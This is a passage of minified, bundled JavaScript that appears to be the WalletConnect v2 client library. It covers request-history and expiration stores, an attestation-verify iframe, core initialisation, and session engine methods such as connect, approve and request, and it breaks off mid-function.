        super(e, t), this.core = e, this.logger = t, this.records = new Map, this.events = new (0, $7etJZ.EventEmitter), this.name = $e9e439c110f17033$export$160142c73cb99dc3, this.version = $e9e439c110f17033$export$8eba9ce85616c607, this.cached = [], this.initialized = !1, this.storagePrefix = $e9e439c110f17033$export$f258d29ae5e3d545, this.init = async ()=>{
            this.initialized || (this.logger.trace("Initialized"), await this.restore(), this.cached.forEach((i)=>this.records.set(i.id, i)), this.cached = [], this.registerEventListeners(), this.initialized = !0);
        }, this.set = (i, s, n)=>{
            if (this.isInitialized(), this.logger.debug("Setting JSON-RPC request history record"), this.logger.trace({
                type: "method",
                method: "set",
                topic: i,
                request: s,
                chainId: n
            }), this.records.has(s.id)) return;
            const a = {
                id: s.id,
                topic: i,
                request: {
                    method: s.method,
                    params: s.params || null
                },
                chainId: n,
                expiry: (0, $a5d33cfc7f8e5437$export$b136d03015bfc12)((0, $aG48A.THIRTY_DAYS))
            };
            this.records.set(a.id, a), this.events.emit($e9e439c110f17033$export$a682338b5ffca937.created, a);
        }, this.resolve = async (i)=>{
            if (this.isInitialized(), this.logger.debug("Updating JSON-RPC response history record"), this.logger.trace({
                type: "method",
                method: "update",
                response: i
            }), !this.records.has(i.id)) return;
            const s = await this.getRecord(i.id);
            typeof s.response > "u" && (s.response = (0, $2e45abd1d679ec32$export$5662a1047b4d1d15)(i) ? {
                error: i.error
            } : {
                result: i.result
            }, this.records.set(s.id, s), this.events.emit($e9e439c110f17033$export$a682338b5ffca937.updated, s));
        }, this.get = async (i, s)=>(this.isInitialized(), this.logger.debug("Getting record"), this.logger.trace({
                type: "method",
                method: "get",
                topic: i,
                id: s
            }), await this.getRecord(s)), this.delete = (i, s)=>{
            this.isInitialized(), this.logger.debug("Deleting record"), this.logger.trace({
                type: "method",
                method: "delete",
                id: s
            }), this.values.forEach((n)=>{
                if (n.topic === i) {
                    if (typeof s < "u" && n.id !== s) return;
                    this.records.delete(n.id), this.events.emit($e9e439c110f17033$export$a682338b5ffca937.deleted, n);
                }
            });
        }, this.exists = async (i, s)=>(this.isInitialized(), this.records.has(s) ? (await this.getRecord(s)).topic === i : !1), this.on = (i, s)=>{
            this.events.on(i, s);
        }, this.once = (i, s)=>{
            this.events.once(i, s);
        }, this.off = (i, s)=>{
            this.events.off(i, s);
        }, this.removeListener = (i, s)=>{
            this.events.removeListener(i, s);
        }, this.logger = (0, $7fc0ce2591a9daef$exports.generateChildLogger)(t, this.name);
    }
    get context() {
        return (0, $7fc0ce2591a9daef$exports.getLoggerContext)(this.logger);
    }
    get storageKey() {
        return this.storagePrefix + this.version + "//" + this.name;
    }
    get size() {
        return this.records.size;
    }
    get keys() {
        return Array.from(this.records.keys());
    }
    get values() {
        return Array.from(this.records.values());
    }
    get pending() {
        const e = [];
        return this.values.forEach((t)=>{
            if (typeof t.response < "u") return;
            const i = {
                topic: t.topic,
                request: (0, $3bb3ddc7bbc938cc$export$11d081ebb32d4398)(t.request.method, t.request.params, t.id),
                chainId: t.chainId
            };
            return e.push(i);
        }), e;
    }
    async setJsonRpcRecords(e) {
        await this.core.storage.setItem(this.storageKey, e);
    }
    async getJsonRpcRecords() {
        return await this.core.storage.getItem(this.storageKey);
    }
    getRecord(e) {
        this.isInitialized();
        const t = this.records.get(e);
        if (!t) {
            const { message: i } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("NO_MATCHING_KEY", `${this.name}: ${e}`);
            throw new Error(i);
        }
        return t;
    }
    async persist() {
        await this.setJsonRpcRecords(this.values), this.events.emit($e9e439c110f17033$export$a682338b5ffca937.sync);
    }
    async restore() {
        try {
            const e = await this.getJsonRpcRecords();
            if (typeof e > "u" || !e.length) return;
            if (this.records.size) {
                const { message: t } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("RESTORE_WILL_OVERRIDE", this.name);
                throw this.logger.error(t), new Error(t);
            }
            this.cached = e, this.logger.debug(`Successfully Restored records for ${this.name}`), this.logger.trace({
                type: "method",
                method: "restore",
                records: this.values
            });
        } catch (e) {
            this.logger.debug(`Failed to Restore records for ${this.name}`), this.logger.error(e);
        }
    }
    registerEventListeners() {
        this.events.on($e9e439c110f17033$export$a682338b5ffca937.created, (e)=>{
            const t = $e9e439c110f17033$export$a682338b5ffca937.created;
            this.logger.info(`Emitting ${t}`), this.logger.debug({
                type: "event",
                event: t,
                record: e
            }), this.persist();
        }), this.events.on($e9e439c110f17033$export$a682338b5ffca937.updated, (e)=>{
            const t = $e9e439c110f17033$export$a682338b5ffca937.updated;
            this.logger.info(`Emitting ${t}`), this.logger.debug({
                type: "event",
                event: t,
                record: e
            }), this.persist();
        }), this.events.on($e9e439c110f17033$export$a682338b5ffca937.deleted, (e)=>{
            const t = $e9e439c110f17033$export$a682338b5ffca937.deleted;
            this.logger.info(`Emitting ${t}`), this.logger.debug({
                type: "event",
                event: t,
                record: e
            }), this.persist();
        }), this.core.heartbeat.on((0, $212993b948b3fe4b$exports.HEARTBEAT_EVENTS).pulse, ()=>{
            this.cleanup();
        });
    }
    cleanup() {
        try {
            this.records.forEach((e)=>{
                (0, $aG48A.toMiliseconds)(e.expiry || 0) - Date.now() <= 0 && (this.logger.info(`Deleting expired history log: ${e.id}`), this.delete(e.topic, e.id));
            });
        } catch (e) {
            this.logger.warn(e);
        }
    }
    isInitialized() {
        if (!this.initialized) {
            const { message: e } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("NOT_INITIALIZED", this.name);
            throw new Error(e);
        }
    }
}
class $e9e439c110f17033$export$e76805ce609031cb extends (0, $bace94c1ef08d1bc$export$41aaa3c39f6f2861) {
    constructor(e, t){
        super(e, t), this.core = e, this.logger = t, this.expirations = new Map, this.events = new (0, $7etJZ.EventEmitter), this.name = $e9e439c110f17033$export$4ddf883392bbc828, this.version = $e9e439c110f17033$export$717295846191925d, this.cached = [], this.initialized = !1, this.storagePrefix = $e9e439c110f17033$export$f258d29ae5e3d545, this.init = async ()=>{
            this.initialized || (this.logger.trace("Initialized"), await this.restore(), this.cached.forEach((i)=>this.expirations.set(i.target, i)), this.cached = [], this.registerEventListeners(), this.initialized = !0);
        }, this.has = (i)=>{
            try {
                const s = this.formatTarget(i);
                return typeof this.getExpiration(s) < "u";
            } catch  {
                return !1;
            }
        }, this.set = (i, s)=>{
            this.isInitialized();
            const n = this.formatTarget(i), a = {
                target: n,
                expiry: s
            };
            this.expirations.set(n, a), this.checkExpiry(n, a), this.events.emit($e9e439c110f17033$export$9013719d9206b0c1.created, {
                target: n,
                expiration: a
            });
        }, this.get = (i)=>{
            this.isInitialized();
            const s = this.formatTarget(i);
            return this.getExpiration(s);
        }, this.del = (i)=>{
            if (this.isInitialized(), this.has(i)) {
                const s = this.formatTarget(i), n = this.getExpiration(s);
                this.expirations.delete(s), this.events.emit($e9e439c110f17033$export$9013719d9206b0c1.deleted, {
                    target: s,
                    expiration: n
                });
            }
        }, this.on = (i, s)=>{
            this.events.on(i, s);
        }, this.once = (i, s)=>{
            this.events.once(i, s);
        }, this.off = (i, s)=>{
            this.events.off(i, s);
        }, this.removeListener = (i, s)=>{
            this.events.removeListener(i, s);
        }, this.logger = (0, $7fc0ce2591a9daef$exports.generateChildLogger)(t, this.name);
    }
    get context() {
        return (0, $7fc0ce2591a9daef$exports.getLoggerContext)(this.logger);
    }
    get storageKey() {
        return this.storagePrefix + this.version + "//" + this.name;
    }
    get length() {
        return this.expirations.size;
    }
    get keys() {
        return Array.from(this.expirations.keys());
    }
    get values() {
        return Array.from(this.expirations.values());
    }
    formatTarget(e) {
        if (typeof e == "string") return (0, $a5d33cfc7f8e5437$export$43ab92477f8713b9)(e);
        if (typeof e == "number") return (0, $a5d33cfc7f8e5437$export$bd13103c2e5cc0c3)(e);
        const { message: t } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("UNKNOWN_TYPE", `Target type: ${typeof e}`);
        throw new Error(t);
    }
    async setExpirations(e) {
        await this.core.storage.setItem(this.storageKey, e);
    }
    async getExpirations() {
        return await this.core.storage.getItem(this.storageKey);
    }
    async persist() {
        await this.setExpirations(this.values), this.events.emit($e9e439c110f17033$export$9013719d9206b0c1.sync);
    }
    async restore() {
        try {
            const e = await this.getExpirations();
            if (typeof e > "u" || !e.length) return;
            if (this.expirations.size) {
                const { message: t } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("RESTORE_WILL_OVERRIDE", this.name);
                throw this.logger.error(t), new Error(t);
            }
            this.cached = e, this.logger.debug(`Successfully Restored expirations for ${this.name}`), this.logger.trace({
                type: "method",
                method: "restore",
                expirations: this.values
            });
        } catch (e) {
            this.logger.debug(`Failed to Restore expirations for ${this.name}`), this.logger.error(e);
        }
    }
    getExpiration(e) {
        const t = this.expirations.get(e);
        if (!t) {
            const { message: i } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("NO_MATCHING_KEY", `${this.name}: ${e}`);
            throw this.logger.error(i), new Error(i);
        }
        return t;
    }
    checkExpiry(e, t) {
        const { expiry: i } = t;
        (0, $aG48A.toMiliseconds)(i) - Date.now() <= 0 && this.expire(e, t);
    }
    expire(e, t) {
        this.expirations.delete(e), this.events.emit($e9e439c110f17033$export$9013719d9206b0c1.expired, {
            target: e,
            expiration: t
        });
    }
    checkExpirations() {
        this.core.relayer.connected && this.expirations.forEach((e, t)=>this.checkExpiry(t, e));
    }
    registerEventListeners() {
        this.core.heartbeat.on((0, $212993b948b3fe4b$exports.HEARTBEAT_EVENTS).pulse, ()=>this.checkExpirations()), this.events.on($e9e439c110f17033$export$9013719d9206b0c1.created, (e)=>{
            const t = $e9e439c110f17033$export$9013719d9206b0c1.created;
            this.logger.info(`Emitting ${t}`), this.logger.debug({
                type: "event",
                event: t,
                data: e
            }), this.persist();
        }), this.events.on($e9e439c110f17033$export$9013719d9206b0c1.expired, (e)=>{
            const t = $e9e439c110f17033$export$9013719d9206b0c1.expired;
            this.logger.info(`Emitting ${t}`), this.logger.debug({
                type: "event",
                event: t,
                data: e
            }), this.persist();
        }), this.events.on($e9e439c110f17033$export$9013719d9206b0c1.deleted, (e)=>{
            const t = $e9e439c110f17033$export$9013719d9206b0c1.deleted;
            this.logger.info(`Emitting ${t}`), this.logger.debug({
                type: "event",
                event: t,
                data: e
            }), this.persist();
        });
    }
    isInitialized() {
        if (!this.initialized) {
            const { message: e } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("NOT_INITIALIZED", this.name);
            throw new Error(e);
        }
    }
}
class $e9e439c110f17033$export$91a8e56769aeb334 extends (0, $bace94c1ef08d1bc$export$873b0b865d85ddb6) {
    constructor(e, t){
        super(e, t), this.projectId = e, this.logger = t, this.name = $e9e439c110f17033$export$3b58f2450f2297e3, this.initialized = !1, this.init = async (i)=>{
            (0, $a5d33cfc7f8e5437$export$f7a1e23e542d38e3)() || !(0, $a5d33cfc7f8e5437$export$4e09c449d6c407f7)() || (this.verifyUrl = i?.verifyUrl || $e9e439c110f17033$export$7e3b1a28ddecdbaa, await this.createIframe());
        }, this.register = async (i)=>{
            var s;
            if (this.initialized || await this.init(), !!this.iframe) try {
                (s = this.iframe.contentWindow) == null || s.postMessage(i.attestationId, this.verifyUrl), this.logger.info(`postMessage sent: ${i.attestationId} ${this.verifyUrl}`);
            } catch  {}
        }, this.resolve = async (i)=>{
            var s;
            if (this.isDevEnv) return "";
            this.logger.info(`resolving attestation: ${i.attestationId}`);
            const n = this.startAbortTimer((0, $aG48A.FIVE_SECONDS)), a = await fetch(`${this.verifyUrl}/attestation/${i.attestationId}`, {
                signal: this.abortController.signal
            });
            return clearTimeout(n), a.status === 200 ? (s = await a.json()) == null ? void 0 : s.origin : "";
        }, this.createIframe = async ()=>{
            try {
                await Promise.race([
                    new Promise((i, s)=>{
                        if (document.getElementById($e9e439c110f17033$export$3b58f2450f2297e3)) return i();
                        const n = document.createElement("iframe");
                        n.setAttribute("id", $e9e439c110f17033$export$3b58f2450f2297e3), n.setAttribute("src", `${this.verifyUrl}/${this.projectId}`), n.style.display = "none", n.addEventListener("load", ()=>{
                            this.initialized = !0, i();
                        }), n.addEventListener("error", (a)=>{
                            s(a);
                        }), document.body.append(n), this.iframe = n;
                    }),
                    new Promise((i)=>{
                        setTimeout(()=>i("iframe load timeout"), (0, $aG48A.toMiliseconds)((0, $aG48A.ONE_SECOND) / 2));
                    })
                ]);
            } catch (i) {
                this.logger.error(`Verify iframe failed to load: ${this.verifyUrl}`), this.logger.error(i);
            }
        }, this.logger = (0, $7fc0ce2591a9daef$exports.generateChildLogger)(t, this.name), this.verifyUrl = $e9e439c110f17033$export$7e3b1a28ddecdbaa, this.abortController = new AbortController, this.isDevEnv = (0, $a5d33cfc7f8e5437$export$8ee0fc9ee280b4ee)() && undefined;
    }
    get context() {
        return (0, $7fc0ce2591a9daef$exports.getLoggerContext)(this.logger);
    }
    startAbortTimer(e) {
        return setTimeout(()=>this.abortController.abort(), (0, $aG48A.toMiliseconds)(e));
    }
}
var $e9e439c110f17033$var$_r = Object.defineProperty, $e9e439c110f17033$var$Mt = Object.getOwnPropertySymbols, $e9e439c110f17033$var$Rr = Object.prototype.hasOwnProperty, $e9e439c110f17033$var$Tr = Object.prototype.propertyIsEnumerable, $e9e439c110f17033$var$Kt = (r, e, t)=>e in r ? $e9e439c110f17033$var$_r(r, e, {
        enumerable: !0,
        configurable: !0,
        writable: !0,
        value: t
    }) : r[e] = t, $e9e439c110f17033$var$kt = (r, e)=>{
    for(var t in e || (e = {}))$e9e439c110f17033$var$Rr.call(e, t) && $e9e439c110f17033$var$Kt(r, t, e[t]);
    if ($e9e439c110f17033$var$Mt) for (var t of $e9e439c110f17033$var$Mt(e))$e9e439c110f17033$var$Tr.call(e, t) && $e9e439c110f17033$var$Kt(r, t, e[t]);
    return r;
};
class $e9e439c110f17033$export$2e2bcd8739ae039 extends (0, $bace94c1ef08d1bc$export$ed533416df113881) {
    constructor(e){
        super(e), this.protocol = $e9e439c110f17033$export$51b1c900ac262bdf, this.version = $e9e439c110f17033$export$f30bd3c8747cdfbe, this.name = $e9e439c110f17033$export$d47601f9de5ee22b, this.events = new (0, $7etJZ.EventEmitter), this.initialized = !1, this.on = (i, s)=>this.events.on(i, s), this.once = (i, s)=>this.events.once(i, s), this.off = (i, s)=>this.events.off(i, s), this.removeListener = (i, s)=>this.events.removeListener(i, s), this.projectId = e?.projectId, this.relayUrl = e?.relayUrl || $e9e439c110f17033$export$a68061e6c48f332a;
        const t = typeof e?.logger < "u" && typeof e?.logger != "string" ? e.logger : (0, $7fc0ce2591a9daef$exports.pino)((0, $7fc0ce2591a9daef$exports.getDefaultLoggerOptions)({
            level: e?.logger || $e9e439c110f17033$export$db0fdb6d486555c2.logger
        }));
        this.logger = (0, $7fc0ce2591a9daef$exports.generateChildLogger)(t, this.name), this.heartbeat = new (0, $212993b948b3fe4b$exports.HeartBeat), this.crypto = new $e9e439c110f17033$export$8ac8b6291b7ccf24(this, this.logger, e?.keychain), this.history = new $e9e439c110f17033$export$eeb4f10f25d479cb(this, this.logger), this.expirer = new $e9e439c110f17033$export$e76805ce609031cb(this, this.logger), this.storage = e != null && e.storage ? e.storage : new (0, (/*@__PURE__*/$parcel$interopDefault($62fc2f1c5fb46a11$exports)))($e9e439c110f17033$var$kt($e9e439c110f17033$var$kt({}, $e9e439c110f17033$export$ba920abfe854b85d), e?.storageOptions)), this.relayer = new $e9e439c110f17033$export$70e73aa29a3d4407({
            core: this,
            logger: this.logger,
            relayUrl: this.relayUrl,
            projectId: this.projectId
        }), this.pairing = new $e9e439c110f17033$export$3370ee24730992a3(this, this.logger), this.verify = new $e9e439c110f17033$export$91a8e56769aeb334(this.projectId || "", this.logger);
    }
    static async init(e) {
        const t = new $e9e439c110f17033$export$2e2bcd8739ae039(e);
        await t.initialize();
        const i = await t.crypto.getClientId();
        return await t.storage.setItem($e9e439c110f17033$export$9e4ca561755938da, i), t;
    }
    get context() {
        return (0, $7fc0ce2591a9daef$exports.getLoggerContext)(this.logger);
    }
    async start() {
        this.initialized || await this.initialize();
    }
    async initialize() {
        this.logger.trace("Initialized");
        try {
            await this.crypto.init(), await this.history.init(), await this.expirer.init(), await this.relayer.init(), await this.heartbeat.init(), await this.pairing.init(), this.initialized = !0, this.logger.info("Core Initialization Success");
        } catch (e) {
            throw this.logger.warn(`Core Initialization Failure at epoch ${Date.now()}`, e), this.logger.error(e.message), e;
        }
    }
}
const $e9e439c110f17033$export$4143ab5b91744744 = $e9e439c110f17033$export$2e2bcd8739ae039;






var $7etJZ = parcelRequire("7etJZ");

var $aG48A = parcelRequire("aG48A");

const $4a472e843fedf2e2$export$4fa962fc67384e02 = "wc", $4a472e843fedf2e2$export$61085c48796ff049 = 2, $4a472e843fedf2e2$export$94715592c220319a = "client", $4a472e843fedf2e2$export$7fa6f9ee1e2cab96 = `${$4a472e843fedf2e2$export$4fa962fc67384e02}@${$4a472e843fedf2e2$export$61085c48796ff049}:${$4a472e843fedf2e2$export$94715592c220319a}:`, $4a472e843fedf2e2$export$8dffb3242f2c5f72 = {
    name: $4a472e843fedf2e2$export$94715592c220319a,
    logger: "error",
    controller: !1,
    relayUrl: "wss://relay.walletconnect.com"
}, $4a472e843fedf2e2$export$fb2c3ad2a2bc26e9 = {
    session_proposal: "session_proposal",
    session_update: "session_update",
    session_extend: "session_extend",
    session_ping: "session_ping",
    session_delete: "session_delete",
    session_expire: "session_expire",
    session_request: "session_request",
    session_request_sent: "session_request_sent",
    session_event: "session_event",
    proposal_expire: "proposal_expire"
}, $4a472e843fedf2e2$export$2e2bb8505f95527b = {
    database: ":memory:"
}, $4a472e843fedf2e2$export$a26ccd6441b7d638 = "WALLETCONNECT_DEEPLINK_CHOICE", $4a472e843fedf2e2$export$a682338b5ffca937 = {
    created: "history_created",
    updated: "history_updated",
    deleted: "history_deleted",
    sync: "history_sync"
}, $4a472e843fedf2e2$export$160142c73cb99dc3 = "history", $4a472e843fedf2e2$export$8eba9ce85616c607 = "0.3", $4a472e843fedf2e2$export$ae6c7a4f7ed730a1 = "proposal", $4a472e843fedf2e2$export$6db28e89b135a53c = (0, $aG48A.THIRTY_DAYS), $4a472e843fedf2e2$export$1e6a4dc5172f4830 = "Proposal expired", $4a472e843fedf2e2$export$a069e98a8dfeec1e = "session", $4a472e843fedf2e2$export$84b1b9dbcdea0475 = (0, $aG48A.SEVEN_DAYS), $4a472e843fedf2e2$export$2db42d5151ad6eb8 = "engine", $4a472e843fedf2e2$export$4edb1ca37014192d = {
    wc_sessionPropose: {
        req: {
            ttl: (0, $aG48A.FIVE_MINUTES),
            prompt: !0,
            tag: 1100
        },
        res: {
            ttl: (0, $aG48A.FIVE_MINUTES),
            prompt: !1,
            tag: 1101
        }
    },
    wc_sessionSettle: {
        req: {
            ttl: (0, $aG48A.FIVE_MINUTES),
            prompt: !1,
            tag: 1102
        },
        res: {
            ttl: (0, $aG48A.FIVE_MINUTES),
            prompt: !1,
            tag: 1103
        }
    },
    wc_sessionUpdate: {
        req: {
            ttl: (0, $aG48A.ONE_DAY),
            prompt: !1,
            tag: 1104
        },
        res: {
            ttl: (0, $aG48A.ONE_DAY),
            prompt: !1,
            tag: 1105
        }
    },
    wc_sessionExtend: {
        req: {
            ttl: (0, $aG48A.ONE_DAY),
            prompt: !1,
            tag: 1106
        },
        res: {
            ttl: (0, $aG48A.ONE_DAY),
            prompt: !1,
            tag: 1107
        }
    },
    wc_sessionRequest: {
        req: {
            ttl: (0, $aG48A.FIVE_MINUTES),
            prompt: !0,
            tag: 1108
        },
        res: {
            ttl: (0, $aG48A.FIVE_MINUTES),
            prompt: !1,
            tag: 1109
        }
    },
    wc_sessionEvent: {
        req: {
            ttl: (0, $aG48A.FIVE_MINUTES),
            prompt: !0,
            tag: 1110
        },
        res: {
            ttl: (0, $aG48A.FIVE_MINUTES),
            prompt: !1,
            tag: 1111
        }
    },
    wc_sessionDelete: {
        req: {
            ttl: (0, $aG48A.ONE_DAY),
            prompt: !1,
            tag: 1112
        },
        res: {
            ttl: (0, $aG48A.ONE_DAY),
            prompt: !1,
            tag: 1113
        }
    },
    wc_sessionPing: {
        req: {
            ttl: (0, $aG48A.THIRTY_SECONDS),
            prompt: !1,
            tag: 1114
        },
        res: {
            ttl: (0, $aG48A.THIRTY_SECONDS),
            prompt: !1,
            tag: 1115
        }
    }
}, $4a472e843fedf2e2$export$409f0c0a13a1b7c6 = {
    min: (0, $aG48A.FIVE_MINUTES),
    max: (0, $aG48A.SEVEN_DAYS)
}, $4a472e843fedf2e2$export$a8430bf2cf90f262 = {
    idle: "idle",
    active: "active"
}, $4a472e843fedf2e2$export$40b296af21bd38a4 = "request", $4a472e843fedf2e2$export$63c37d8ae5931ad5 = [
    "wc_sessionPropose",
    "wc_sessionRequest",
    "wc_authRequest"
];
var $4a472e843fedf2e2$var$ts = Object.defineProperty, $4a472e843fedf2e2$var$is = Object.defineProperties, $4a472e843fedf2e2$var$rs = Object.getOwnPropertyDescriptors, $4a472e843fedf2e2$var$le = Object.getOwnPropertySymbols, $4a472e843fedf2e2$var$ns = Object.prototype.hasOwnProperty, $4a472e843fedf2e2$var$os = Object.prototype.propertyIsEnumerable, $4a472e843fedf2e2$var$pe = (d, r, e)=>r in d ? $4a472e843fedf2e2$var$ts(d, r, {
        enumerable: !0,
        configurable: !0,
        writable: !0,
        value: e
    }) : d[r] = e, $4a472e843fedf2e2$var$w = (d, r)=>{
    for(var e in r || (r = {}))$4a472e843fedf2e2$var$ns.call(r, e) && $4a472e843fedf2e2$var$pe(d, e, r[e]);
    if ($4a472e843fedf2e2$var$le) for (var e of $4a472e843fedf2e2$var$le(r))$4a472e843fedf2e2$var$os.call(r, e) && $4a472e843fedf2e2$var$pe(d, e, r[e]);
    return d;
}, $4a472e843fedf2e2$var$F = (d, r)=>$4a472e843fedf2e2$var$is(d, $4a472e843fedf2e2$var$rs(r));
class $4a472e843fedf2e2$var$as extends (0, $bace94c1ef08d1bc$export$87df43c730effa30) {
    constructor(r){
        super(r), this.name = $4a472e843fedf2e2$export$2db42d5151ad6eb8, this.events = new (0, (/*@__PURE__*/$parcel$interopDefault($7etJZ))), this.initialized = !1, this.ignoredPayloadTypes = [
            (0, $a5d33cfc7f8e5437$export$406e97c329f0f3d4)
        ], this.requestQueue = {
            state: $4a472e843fedf2e2$export$a8430bf2cf90f262.idle,
            requests: []
        }, this.requestQueueDelay = (0, $aG48A.ONE_SECOND), this.init = async ()=>{
            this.initialized || (await this.cleanup(), this.registerRelayerEvents(), this.registerExpirerEvents(), this.client.core.pairing.register({
                methods: Object.keys($4a472e843fedf2e2$export$4edb1ca37014192d)
            }), this.initialized = !0, setTimeout(()=>{
                this.requestQueue.requests = this.getPendingSessionRequests(), this.processRequestQueue();
            }, (0, $aG48A.toMiliseconds)(this.requestQueueDelay)));
        }, this.connect = async (e)=>{
            this.isInitialized();
            const s = $4a472e843fedf2e2$var$F($4a472e843fedf2e2$var$w({}, e), {
                requiredNamespaces: e.requiredNamespaces || {},
                optionalNamespaces: e.optionalNamespaces || {}
            });
            await this.isValidConnect(s);
            const { pairingTopic: t, requiredNamespaces: i, optionalNamespaces: n, sessionProperties: o, relays: a } = s;
            let l = t, h, I = !1;
            if (l && (I = this.client.core.pairing.pairings.get(l).active), !l || !I) {
                const { topic: f, uri: y } = await this.client.core.pairing.create();
                l = f, h = y;
            }
            const g = await this.client.core.crypto.generateKeyPair(), E = $4a472e843fedf2e2$var$w({
                requiredNamespaces: i,
                optionalNamespaces: n,
                relays: a ?? [
                    {
                        protocol: (0, $e9e439c110f17033$export$822d0bd1635d5360)
                    }
                ],
                proposer: {
                    publicKey: g,
                    metadata: this.client.metadata
                }
            }, o && {
                sessionProperties: o
            }), { reject: u, resolve: T, done: K } = (0, $a5d33cfc7f8e5437$export$cbf9e3cc9ffc85cb)((0, $aG48A.FIVE_MINUTES), $4a472e843fedf2e2$export$1e6a4dc5172f4830);
            if (this.events.once((0, $a5d33cfc7f8e5437$export$e3eb27ce66c0f6d9)("session_connect"), async ({ error: f, session: y })=>{
                if (f) u(f);
                else if (y) {
                    y.self.publicKey = g;
                    const B = $4a472e843fedf2e2$var$F($4a472e843fedf2e2$var$w({}, y), {
                        requiredNamespaces: y.requiredNamespaces,
                        optionalNamespaces: y.optionalNamespaces
                    });
                    await this.client.session.set(y.topic, B), await this.setExpiry(y.topic, y.expiry), l && await this.client.core.pairing.updateMetadata({
                        topic: l,
                        metadata: y.peer.metadata
                    }), T(B);
                }
            }), !l) {
                const { message: f } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("NO_MATCHING_KEY", `connect() pairing topic: ${l}`);
                throw new Error(f);
            }
            const L = await this.sendRequest(l, "wc_sessionPropose", E), he = (0, $a5d33cfc7f8e5437$export$b136d03015bfc12)((0, $aG48A.FIVE_MINUTES));
            return await this.setProposal(L, $4a472e843fedf2e2$var$w({
                id: L,
                expiry: he
            }, E)), {
                uri: h,
                approval: K
            };
        }, this.pair = async (e)=>(this.isInitialized(), await this.client.core.pairing.pair(e)), this.approve = async (e)=>{
            this.isInitialized(), await this.isValidApprove(e);
            const { id: s, relayProtocol: t, namespaces: i, sessionProperties: n } = e, o = this.client.proposal.get(s);
            let { pairingTopic: a, proposer: l, requiredNamespaces: h, optionalNamespaces: I } = o;
            a = a || "", (0, $a5d33cfc7f8e5437$export$16a0268bc22b47b0)(h) || (h = (0, $a5d33cfc7f8e5437$export$a8daa26a7c60ef90)(i, "approve()"));
            const g = await this.client.core.crypto.generateKeyPair(), E = l.publicKey, u = await this.client.core.crypto.generateSharedKey(g, E);
            a && s && (await this.client.core.pairing.updateMetadata({
                topic: a,
                metadata: l.metadata
            }), await this.sendResult(s, a, {
                relay: {
                    protocol: t ?? "irn"
                },
                responderPublicKey: g
            }), await this.client.proposal.delete(s, (0, $a5d33cfc7f8e5437$export$8203ef1531c8b5b5)("USER_DISCONNECTED")), await this.client.core.pairing.activate({
                topic: a
            }));
            const T = $4a472e843fedf2e2$var$w({
                relay: {
                    protocol: t ?? "irn"
                },
                namespaces: i,
                requiredNamespaces: h,
                optionalNamespaces: I,
                pairingTopic: a,
                controller: {
                    publicKey: g,
                    metadata: this.client.metadata
                },
                expiry: (0, $a5d33cfc7f8e5437$export$b136d03015bfc12)($4a472e843fedf2e2$export$84b1b9dbcdea0475)
            }, n && {
                sessionProperties: n
            });
            await this.client.core.relayer.subscribe(u), await this.sendRequest(u, "wc_sessionSettle", T);
            const K = $4a472e843fedf2e2$var$F($4a472e843fedf2e2$var$w({}, T), {
                topic: u,
                pairingTopic: a,
                acknowledged: !1,
                self: T.controller,
                peer: {
                    publicKey: l.publicKey,
                    metadata: l.metadata
                },
                controller: g
            });
            return await this.client.session.set(u, K), await this.setExpiry(u, (0, $a5d33cfc7f8e5437$export$b136d03015bfc12)($4a472e843fedf2e2$export$84b1b9dbcdea0475)), {
                topic: u,
                acknowledged: ()=>new Promise((L)=>setTimeout(()=>L(this.client.session.get(u)), 500))
            };
        }, this.reject = async (e)=>{
            this.isInitialized(), await this.isValidReject(e);
            const { id: s, reason: t } = e, { pairingTopic: i } = this.client.proposal.get(s);
            i && (await this.sendError(s, i, t), await this.client.proposal.delete(s, (0, $a5d33cfc7f8e5437$export$8203ef1531c8b5b5)("USER_DISCONNECTED")));
        }, this.update = async (e)=>{
            this.isInitialized(), await this.isValidUpdate(e);
            const { topic: s, namespaces: t } = e, i = await this.sendRequest(s, "wc_sessionUpdate", {
                namespaces: t
            }), { done: n, resolve: o, reject: a } = (0, $a5d33cfc7f8e5437$export$cbf9e3cc9ffc85cb)();
            return this.events.once((0, $a5d33cfc7f8e5437$export$e3eb27ce66c0f6d9)("session_update", i), ({ error: l })=>{
                l ? a(l) : o();
            }), await this.client.session.update(s, {
                namespaces: t
            }), {
                acknowledged: n
            };
        }, this.extend = async (e)=>{
            this.isInitialized(), await this.isValidExtend(e);
            const { topic: s } = e, t = await this.sendRequest(s, "wc_sessionExtend", {}), { done: i, resolve: n, reject: o } = (0, $a5d33cfc7f8e5437$export$cbf9e3cc9ffc85cb)();
            return this.events.once((0, $a5d33cfc7f8e5437$export$e3eb27ce66c0f6d9)("session_extend", t), ({ error: a })=>{
                a ? o(a) : n();
            }), await this.setExpiry(s, (0, $a5d33cfc7f8e5437$export$b136d03015bfc12)($4a472e843fedf2e2$export$84b1b9dbcdea0475)), {
                acknowledged: i
            };
        }, this.request = async (e)=>{
            this.isInitialized(), await this.isValidRequest(e);
            const { chainId: s, request: t, topic: i, expiry: n } = e, o = await this.sendRequest(i, "wc_sessionRequest", {
                request: t,
                chainId: s
            }, n), { done: a, resolve: l, reject: h } = (0, $a5d33cfc7f8e5437$export$cbf9e3cc9ffc85cb)(n);
            this.events.once((0, $a5d33cfc7f8e5437$export$e3eb27ce66c0f6d9)("session_request", o), ({ error: g, result: E })=>{
                g ? h(g) : l(E);
            }), this.client.events.emit("session_request_sent", {
                topic: i,
                request: t,
                chainId: s,
                id: o
            });
            const I = await this.client.core.storage.getItem($4a472e843fedf2e2$export$a26ccd6441b7d638);
            return (0, $a5d33cfc7f8e5437$export$694a208c8abca99a)({
                id: o,
                topic: i,
                wcDeepLink: I
            }), await a();
        }, this.respond = async (e)=>{
            this.isInitialized(), await this.isValidRespond(e);
            const { topic: s, response: t } = e, { id: i } = t;
            (0, $2e45abd1d679ec32$export$cb3d3b20e3223d77)(t) ? await this.sendResult(i, s, t.result) : (0, $2e45abd1d679ec32$export$5662a1047b4d1d15)(t) && await this.sendError(i, s, t.error), this.cleanupAfterResponse(e);
        }, this.ping = async (e)=>{
            this.isInitialized(), await this.isValidPing(e);
            const { topic: s } = e;
            if (this.client.session.keys.includes(s)) {
